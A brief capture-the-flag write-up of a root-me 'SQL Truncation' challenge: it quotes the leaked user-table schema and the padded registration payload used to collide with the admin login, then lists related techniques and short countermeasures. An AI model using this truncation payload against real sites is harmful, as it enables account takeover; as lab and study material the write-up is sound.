SQL truncation¶

root-me challenge: SQL Truncation: Gain access to the administration zone.

Trying to register as admin, in the response:

<!--
CREATE TABLE IF NOT EXISTS user(   
	id INT NOT NULL AUTO_INCREMENT,
    login VARCHAR(12),
    password CHAR(32),
    PRIMARY KEY (id));
-->

Using SQL Truncation Attack:

login=admin+++++++a&password=admin123

Techniques¶

• SQL injection

• Server-side injection runbook

Counter moves¶

SQL truncation is what this page works through. Server-side validation and least privilege are what these reduce to. Seen from the other side, this sits in the blue notes on the application layer as a target.